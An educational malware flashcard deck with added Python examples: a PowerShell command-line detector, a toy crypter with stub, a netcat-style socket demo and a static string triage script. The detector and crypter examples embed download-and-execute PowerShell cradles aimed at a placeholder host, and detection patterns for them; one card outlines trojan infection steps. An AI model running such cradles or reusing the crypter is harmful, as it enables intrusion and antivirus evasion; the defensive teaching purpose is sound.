Module 07: Malware Threats Flashcards

1
Q

Malware

A

Malicious software that damages or disables computer systems and gives the attacker limited or full control of them, typically for theft or fraud.

How It Works: Malware is distributed via infected files, email attachments, or malicious links, and then runs on the victim's machine with the privileges of the user who launched it.

Common Tools: Metasploit, Cobalt Strike, and custom scripts. These are attack frameworks used to build, deliver and control payloads rather than malware families in their own right.

2
Q

Viruses

A

Malware that attaches itself to a host file or program and spreads when the infected file is executed. Unlike a worm, a virus needs a host to live in and something (usually a user) to run it.

3
Q

Worms

A

Self-replicating malware that spreads on its own across networks, usually by exploiting a vulnerability or weak credentials on reachable hosts, without needing a host file or user action.

4
Q

APT

A

Advanced Persistent Threat: a long-term, stealthy attack campaign, usually run by a well-resourced group, aimed at stealing data or keeping ongoing access to a network.

How It Works: APTs work in stages (initial compromise, credential theft, lateral movement, persistence, exfiltration) while staying below detection thresholds; the "persistent" part is the operator's patience and ability to re-enter, not any single implant.
Common Tools: Cobalt Strike, Mimikatz, and custom malware tailored for persistence.

5
Q

Trojans

A

Malware disguised as legitimate software that, once executed, provides unauthorized access or control to an attacker.

How It Works: Users unknowingly download and run trojans, which may install backdoors or steal data.
Common Tools: Remote Access Trojans (RATs) such as NanoCore, njRAT, Beast, and DarkComet.

6
Q

Fileless malware

A

Malware that avoids writing its payload to disk, running in memory to evade antivirus that scans files; where persistence is needed it hides in places like the registry or WMI event subscriptions rather than in an executable.

How It Works: Abuses legitimate, signed scripting engines and binaries (PowerShell, WMI and other LOLBins) to load and execute code directly in RAM. Script-block logging, command-line auditing and memory forensics catch it where file scanning cannot.

Common Tools: PowerShell Empire, Cobalt Strike, and Living Off the Land techniques (LOLBins).
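Added example (not part of this deck): the command-line triage a detection engineer writes for the PowerShell/WMI tradecraft described above. It decodes -EncodedCommand arguments (base64 of UTF-16LE text) and scores a few indicators such as download cradles, hidden windows and WMI-spawned processes. The event lines are constructed, and the indicator list and the "two indicators is suspicious" threshold are this example's own assumptions, not a vendor rule set.

```python
"""Triage process command lines for fileless PowerShell/WMI tradecraft.

Added example for the fileless-malware card; not part of the deck. The
event lines are constructed (the CommandLine field of a Sysmon event 1 or
a 4688 record), and the indicators and the threshold are assumptions.
"""
import base64
import re
from typing import Optional


def encode_powershell(script: str) -> str:
    """Build what -EncodedCommand expects: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse encode_powershell; None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen in the wild. The blob must be at least 16 base64 characters.
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

INDICATORS = {
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web_download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "wmi_spawn": re.compile(r"wmic(?:\.exe)?\s+process\s+call\s+create|win32_process", re.I),
    "policy_bypass": re.compile(r"-e(?:p|x(?:ecutionpolicy)?)?\s+bypass", re.I),
    "reflective_load": re.compile(r"reflection\.assembly|frombase64string", re.I),
}


def triage(cmdline: str) -> dict:
    """Decode any -enc payload, then match indicators on raw + decoded text."""
    hits = []
    decoded = None
    m = ENCODED_ARG.search(cmdline)
    if m:
        hits.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits += [name for name, rx in INDICATORS.items() if rx.search(text)]
    # One weak indicator (an admin script run with -ExecutionPolicy Bypass) is
    # noise; two or more, or an -enc blob that will not decode, is worth a look.
    suspicious = len(hits) >= 2 or ("encoded_command" in hits and decoded is None)
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits, "suspicious": suspicious}


STAGE_ONE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"

# Constructed events: benign admin usage, an encoded download cradle,
# a WMI-spawned cradle, and an interactive one-liner.
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGE_ONE),
    'wmic.exe process call create "powershell -c ' + STAGE_ONE + '"',
    "powershell.exe Get-ChildItem C:\\Users",
]


def triage_all(events):
    return [triage(e) for e in events]


if __name__ == "__main__":
    for r in triage_all(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['indicators']}  {r['cmdline'][:60]}")
```

Only the second and third constructed events trip the threshold; the backup script with -ExecutionPolicy Bypass scores one indicator and is left alone, which is the point of scoring rather than matching single strings.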

7
Q

Crypters

A

A tool that encrypts the malware body and prepends a small stub that decrypts and runs it in memory, so the file on disk no longer matches static antivirus signatures while its function is unchanged. Many crypters re-encrypt with a fresh key per build so every sample looks different.

8
Q

Downloader

A

A small piece of malware that connects to a remote server to download additional malicious components or updates once the initial infection is successful.

9
Q

Dropper

A

A type of malware that installs and deploys other malicious files onto the infected system, often used to deliver trojans or ransomware.

10
Q

Exploit

A

Code that takes advantage of a specific vulnerability in software or the OS to gain unauthorized access or escalate privileges.

11
Q

Injector

A

Injects malicious code into legitimate processes running on the system, allowing the malware to hide within trusted applications and evade detection.

12
Q

Obfuscator

A

Alters the malware’s code to make it harder to analyze, often by renaming functions or adding confusing, unused code sequences.

13
Q

Packer

A

Compresses (and often encrypts) the original executable and wraps it in a small unpacking stub; the stub restores the original code in memory at run time, so the file on disk does not match static signatures. High-entropy sections and a tiny import table are the usual tells of a packed sample.
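Added example (not from this deck) covering the crypter card (7) and the packer card (13): a toy crypter and its stub, plus the two checks a scanner applies in response. Encrypting the body makes byte signatures miss, and it also raises the Shannon entropy to near 8 bits per byte, which is exactly the heuristic analysts use to spot packed or crypted sections. The SHA-256 counter-mode keystream and the stand-in "payload" text are this example's own constructions; a real crypter stub would carry RC4 or AES code instead.

```python
"""Toy crypter + stub, and the signature/entropy checks a scanner uses.

Added example for the crypter and packer cards; not the deck's content.
The keystream construction and the 'payload' are constructed for the demo.
"""
import hashlib
import math
import os
from collections import Counter


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from SHA-256 (toy stand-in for a real cipher)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "little")).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crypt(payload: bytes, key: bytes) -> bytes:
    """Crypter side: fresh random nonce per build, XOR payload with keystream."""
    nonce = os.urandom(16)
    return nonce + xor_bytes(payload, keystream(key, nonce, len(payload)))


def stub_decrypt(blob: bytes, key: bytes) -> bytes:
    """Stub side: what runs on the victim, restoring the payload in memory only."""
    nonce, body = blob[:16], blob[16:]
    return xor_bytes(body, keystream(key, nonce, len(body)))


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; ~4-5 for text/code, close to 8 for encrypted or compressed data."""
    n = len(data)
    counts = Counter(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def signature_hits(data: bytes, signatures) -> list:
    """The static check a crypter is built to defeat: plain byte-pattern matching."""
    return [s for s in signatures if s in data]


# Constructed stand-in payload: deliberately low entropy, like real code or script.
PAYLOAD = (b"cmd /c powershell -w hidden -c \"IEX ((New-Object Net.WebClient)"
           b".DownloadString('http://example.invalid/stage2'))\"\r\n") * 40
SIGNATURES = [b"DownloadString", b"Net.WebClient", b"-w hidden"]
KEY = b"demo-key-not-secret"


def demo() -> dict:
    blob = crypt(PAYLOAD, KEY)
    return {
        "plain_sigs": signature_hits(PAYLOAD, SIGNATURES),
        "crypted_sigs": signature_hits(blob, SIGNATURES),
        "plain_entropy": shannon_entropy(PAYLOAD),
        "crypted_entropy": shannon_entropy(blob),
        "roundtrip_ok": stub_decrypt(blob, KEY) == PAYLOAD,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:16} {v}")
```

The same two observations drive packer detection in PE scanners: a section whose entropy sits above roughly 7 bits per byte, next to an import table that lists almost nothing, is the profile of a stub waiting to unpack. Note that a single-byte XOR "crypter" would not move the entropy at all (it only permutes byte values), which is why the toy uses a proper keystream.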

14
Q

Payload

A

The part of malware that performs the malicious activity, such as stealing data, encrypting files, or controlling the infected system.

15
Q

Malicious code

A

Any code within the malware designed to harm, steal, or control, encompassing everything from payloads to self-replication functions.

16
Q

PUA

A

Potentially Unwanted Application (PUA): software that is not outright malicious but may pose risks to the security and privacy of data on the system where it is installed, such as adware, toolbars and bundled "junkware" that the user did not knowingly ask for.

17
Q

How do you infect a system using a trojan?

A

  1. Create a new Trojan package, typically with a Trojan construction kit
  2. Employ a dropper or downloader to install the malicious code on the target system
  3. Employ a wrapper (binder) to attach the Trojan to a legitimate file so it runs alongside it
  4. Employ a crypter to encrypt the Trojan and defeat signature-based detection
  5. Propagate the Trojan by various methods: malicious links, attachments, bundled downloads (historically a bare .exe sent by email)
  6. Deploy the Trojan on the victim's machine by executing the dropper or downloader there, fetching further components over covert, often encrypted, channels
  7. Execute the damage routine

18
Q

Sheep dipping

A

Sheep dipping is the analysis of suspect files, incoming messages, removable media etc. for malware on an isolated machine before they are allowed onto the production network. It is often done in a sandbox, but the terms are not synonyms: the sheep dip is the quarantine step, the sandbox is one tool used in it. Historically a sheep-dip computer was a stand-alone, heavily instrumented staging machine for scanning physical media.

19
Q

Malware analysis

A

Malware analysis is the process of reverse engineering a specific piece of malware to determine its origin, functionality, and potential impact.

20
Q

Static vs dynamic code analysis

A

Static Code Analysis: Examines the code without running it, looking for vulnerabilities or malicious patterns by analyzing the code structure, syntax, and logic. This is like reading a recipe to spot mistakes before cooking.

Dynamic Code Analysis: Tests the code while it’s running to observe its actual behavior in real time, checking for unexpected actions, such as modifying files or network activity. This is like tasting the dish while cooking to see how it actually turns out.

21
Q

Netcat

A

Netcat (often called the “Swiss Army knife” of networking) is a simple command-line tool used to send and receive data over the network, allowing for network communication and port listening.

How Netcat Works
- Listener Mode: Netcat can listen on a port and act as a server. With traditional (Hobbit/GNU) netcat, nc -l -p 1234 listens on port 1234; the OpenBSD version rejects -p together with -l and uses nc -l 1234 instead.
- Client Mode: Netcat can also connect to a listener (another Netcat instance or any TCP/UDP service) as a client: nc <IP> 1234 connects to the listener on the specified IP and port.
- Data Transfer: Once connected, whatever arrives on stdin is written to the socket and whatever arrives from the socket is written to stdout, which is all that is needed for file transfer (redirect a file into the client, redirect the listener's output to a file), banner grabbing, port scanning (nc -z), and remote shell access.

Use Cases
Netcat is popular for port scanning, file transfer, simple chat setups, and setting up backdoors in penetration testing because it establishes raw connections and moves data with no protocol overhead. The backdoor use relies on the -e option (bind a program such as /bin/sh to the connection), which exists only in traditional netcat and in Ncat (--exec / --sh-exec); OpenBSD netcat deliberately omits it, so on such systems a shell has to be wired up through a named pipe instead.
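Added example (not from this deck, and not netcat itself): the listener, client and connect-probe behaviour described above rebuilt with plain Python sockets on the loopback interface, so the mechanics of nc -l, nc <host> <port> and nc -z can be reproduced and tested without the binary. Ports are ephemeral and the transferred "file" is constructed.

```python
"""What netcat does underneath: a listener ('nc -l <port>'), a client that
streams a file to it ('nc <host> <port> < file'), and a connect probe
('nc -z <host> <port>'). Added example for the Netcat card; plain sockets,
not netcat. Ports are ephemeral and the payload is constructed.
"""
import socket
import threading


def serve_once(bound: socket.socket, sink: bytearray) -> None:
    """Listener side: accept one connection, read until the peer sends EOF."""
    conn, _ = bound.accept()
    with conn:
        while True:
            chunk = conn.recv(4096)
            if not chunk:          # peer closed its write side: transfer done
                break
            sink += chunk
    bound.close()


def start_listener(sink: bytearray):
    """Bind an ephemeral loopback port and serve one connection in a thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    worker = threading.Thread(target=serve_once, args=(srv, sink), daemon=True)
    worker.start()
    return port, worker


def send_bytes(host: str, port: int, data: bytes) -> None:
    """Client side: connect, stream the bytes, then signal EOF by half-closing."""
    with socket.create_connection((host, port), timeout=5) as conn:
        conn.sendall(data)
        conn.shutdown(socket.SHUT_WR)


def is_port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """Connect probe: the whole of 'nc -z' style TCP port scanning."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def transfer_demo(data: bytes) -> bytes:
    """Listener in one thread, client in this one; returns what arrived."""
    received = bytearray()
    port, worker = start_listener(received)
    send_bytes("127.0.0.1", port, data)
    worker.join(timeout=5)
    return bytes(received)


def scan_demo():
    """Probe one listening port and one port we just released (closed)."""
    open_port, worker = start_listener(bytearray())
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()
    result = (is_port_open("127.0.0.1", open_port), is_port_open("127.0.0.1", closed_port))
    worker.join(timeout=5)
    return result


DEMO_FILE = b"constructed file contents line\n" * 300   # ~9 KB, spans several recv() calls

if __name__ == "__main__":
    got = transfer_demo(DEMO_FILE)
    print("transferred", len(got), "bytes, intact:", got == DEMO_FILE)
    print("open/closed probe:", scan_demo())
```

The half-close in send_bytes is the detail that trips people up with real netcat file transfers: the listener only knows the file is complete when the client's write side closes, which is why nc -q / -N flags (or Ctrl-C) are needed on some versions.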

22
Q

PE Explorer

A

PE Explorer is a Windows application used for analyzing and editing Portable Executable (PE) files, which are the standard executable file format in Windows (e.g., .exe, .dll files). It allows users to inspect and modify the internal structure of PE files, making it useful for software developers, reverse engineers, and malware analysts.

One of many PE tools. It lists the imports (API calls the application pulls from OS DLLs such as kernel32.dll) and exports, section headers and resources, which is often enough to guess what a sample does before running it.
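Added example (not from this deck) serving the static-analysis card (20), the PE Explorer card (22) and the injector card (11): the first pass an analyst does on a sample without running it. It pulls ASCII and UTF-16LE strings out of a binary blob, extracts network IOCs, and groups any API names it finds into behaviour families (the VirtualAllocEx / WriteProcessMemory / CreateRemoteThread trio is the classic process-injection fingerprint that a PE viewer's import list exposes). The blob is constructed, with non-printable filler standing in for code and documentation placeholders for the URL and IP; the API families and the "two names per family" threshold are this example's own assumptions. It matches strings rather than parsing the import directory, so a packed sample, which resolves imports at run time, would show almost nothing here.

```python
"""Static triage of a binary blob: strings, network IOCs, API-name families.

Added example for the static-analysis, PE Explorer and injector cards; not
part of the deck. The blob, the API families and the threshold are
constructed assumptions for illustration.
"""
import re

ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")            # like the `strings` utility
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")     # UTF-16LE runs, common in PE files
URL_RX = re.compile(r"https?://[\w.\-]+(?:/[\w./\-?=&%]*)?", re.I)
IPV4_RX = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
RUN_KEY_RX = re.compile(r"CurrentVersion\\Run", re.I)

# Imported API names sit null-terminated in a PE's import name table, which is
# what a PE viewer lists as imports; grouped here by what they are usually for.
API_FAMILIES = {
    "process_injection": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread", "NtUnmapViewOfSection"},
    "anti_debug": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess"},
    "network": {"InternetOpenA", "InternetOpenUrlA", "InternetReadFile", "WSAStartup"},
    "persistence": {"RegSetValueExA", "CreateServiceA"},
}


def extract_strings(blob: bytes) -> list:
    """ASCII and UTF-16LE runs of 6+ printable characters, in file order."""
    found = [(m.start(), m.group().decode("ascii")) for m in ASCII_RUN.finditer(blob)]
    found += [(m.start(), m.group().decode("utf-16-le")) for m in WIDE_RUN.finditer(blob)]
    return [s for _, s in sorted(found)]


def static_triage(blob: bytes) -> dict:
    """Strings -> IOCs and behaviour hints, without executing anything."""
    strings = extract_strings(blob)
    joined = "\n".join(strings)
    present = set(strings)          # exact match: API names are standalone strings
    api_hits = {fam: sorted(present & names) for fam, names in API_FAMILIES.items()}
    # One API name alone is weak evidence (IsDebuggerPresent is in plenty of
    # legitimate software); two or more from a family is worth reporting.
    families = sorted(fam for fam, hit in api_hits.items() if len(hit) >= 2)
    return {
        "strings": strings,
        "urls": URL_RX.findall(joined),
        "ips": IPV4_RX.findall(joined),
        "api_hits": api_hits,
        "families": families,
        "persistence_run_key": bool(RUN_KEY_RX.search(joined)),
    }


FILLER = b"\x00\x01\x02\xff\xfe\x90\xcc\x07" * 8   # non-printable padding standing in for code
SAMPLE_BLOB = (                                     # constructed sample, not a real file
    b"MZ" + FILLER
    + b"kernel32.dll\x00VirtualAllocEx\x00WriteProcessMemory\x00CreateRemoteThread\x00"
    + FILLER + b"IsDebuggerPresent\x00" + FILLER
    + b"wininet.dll\x00InternetOpenA\x00InternetOpenUrlA\x00" + FILLER
    + "http://example.invalid/gate.php".encode("utf-16-le") + b"\x00\x00" + FILLER
    + b"192.0.2.10\x00" + FILLER
    + b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\x00" + FILLER
)

if __name__ == "__main__":
    report = static_triage(SAMPLE_BLOB)
    print("families:", report["families"])
    print("urls:", report["urls"], "ips:", report["ips"])
    print("run key:", report["persistence_run_key"])
```

Reading the output the way an analyst would: injection APIs plus WinINet plus a Run key string is enough to predict "downloads something, injects it into another process, survives reboot" before the sample is ever detonated, which is what dynamic analysis would then confirm.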

23
Q

What is malware disassembly and what are common tools

A

Disassembly is a static technique: a disassembler translates the binary's machine code back into assembly instructions so the analyst can read control flow, API calls and data references without running the sample. IDA Pro and Ghidra are the most common disassemblers (both also decompile to C-like pseudocode).

By contrast, dynamic malware analysis is behaviour-based: run the sample in an isolated environment and look at the processes it spawns, the files and registry keys it touches, and the network connections it makes, compared against a clean baseline.
